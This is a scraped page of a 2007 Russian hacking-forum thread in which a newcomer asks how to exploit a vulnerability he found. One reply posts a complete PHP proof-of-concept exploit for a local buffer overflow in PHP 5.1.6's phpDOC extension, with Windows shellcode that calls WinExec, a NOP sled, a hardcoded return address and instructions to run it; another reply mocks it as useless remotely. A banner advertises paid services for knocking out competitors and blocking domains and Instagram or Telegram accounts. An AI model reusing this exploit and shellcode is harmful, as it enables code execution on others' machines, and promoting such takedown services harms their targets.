Форум АНТИЧАТ - Нашел уязвимость, как воспользоваться? Помогите

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Нашел уязвимость, как воспользоваться? Помогите

Страница 2 из 2

Опции темы

Поиск в этой теме

Опции просмотра

#11

15.05.2007, 21:34

-=lebed=-

Флудер

Регистрация: 21.06.2006

Сообщений: 3,193

Провел на форуме:
12702287

Репутация: 4738

Вот почитай: http://securityvulns.ru/Gnews772.html

#12

16.05.2007, 06:22

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

Цитата:

Сообщение от Legalz

scrat это ты к чему?

а он к тому же, что и ты постил...

это и я так могу

апапваыфЫВАУАПТАПЫВ ПОМОГИТЕ С ЛАМЕРОМ щас я думаю(надеюсь) с ламером модеры или админы помогут топ удалят... видел твой топ седня просто думаю новый, критиковать не стоит, а он блин продолжает....

to Legalz на будующее....

не все то золото, что плохо лежит

__________________
Карфаген должен быть разрушен...

#13

16.05.2007, 20:28

fly

Постоянный

Регистрация: 15.04.2007

Сообщений: 645

Провел на форуме:
967842

Репутация: 251

Отправить сообщение для fly с помощью ICQ

Человек начинает надо помогать таким , а то потом 2 года дадут за обычный взлом.

По твоей проблеме есть сплоит , правда не знаю рабочий ли он! !!!

Код:

<?php
//PHP 5.1.6 with PECL phpDOC confirm_phpdoc_compiled() local buffer overflow poc exploit


if (!extension_loaded("phpDOC")){
die("you need the phpDOC extension loaded.");
}


$____scode=
"\xeb\x1b".
"\x5b".
"\x31\xc0".
"\x50".
"\x31\xc0".
"\x88\x43\x59".
"\x53".
"\xbb\xca\x73\xe9\x77". //WinExec
"\xff\xd3".
"\x31\xc0".
"\x50".
"\xbb\x5c\xcf\xe9\x77". //ExitProcess
"\xff\xd3".
"\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64".
"\x2e".
"\x65".
"\x78\x65".
"\x20\x2f".
"\x63\x20".
"start notepad & ";

//eip & ecx set to the same value ...
$eip="\x47\x30\xE9\x77";//0x77E93047      pop ECX - pop - retbis kernel32.dll
//and further (junk...) inc edi, xor cl ch, *ja short* 
//should work on sp4 if you find an usable address
$____suntzu=str_repeat("\x90",1393 - strlen($____scode)).$____scode.str_repeat("\x90",30).$eip.str_repeat("\x90",12);
confirm_phpdoc_compiled($____suntzu);

?>

Для юза надо просто указать путь к php пример: cmd >php.exe sploit.php
Но твой скан это просто эвристика. Лучше nmap! Скинь ссылку посмотреть!

#14

17.05.2007, 15:59

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

Oo
Вы наркоманы.

Цитата:

действую вот так:
nmap->milworm->hacked
firefox->site->manual scan->hacked

А ты вообще сумашедший.

fly

Цитата:

local buffer overflow poc exploit

Цитата:

Для юза надо просто указать путь к php пример: cmd >php.exe sploit.php

Ты знаешь что такое локальный эксплойт ?

Последний раз редактировалось [ cash ]; 17.05.2007 в 16:01..

Страница 2 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
ПомогитЕ !!! подалуста найти кряк	гейлордфакерЪ	Болталка	2	30.08.2007 14:48
Плакаль!!!! Бродил вчера по врачебным форумам, искал инфу про лопнувшие в глазах ....	$G@mer	Болталка	6	12.10.2006 17:12
Как не банально но помогите	BigFatGranny	Болталка	3	19.08.2006 17:50
помогите плиз	McAron	АнтиАдмин	9	06.03.2005 07:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход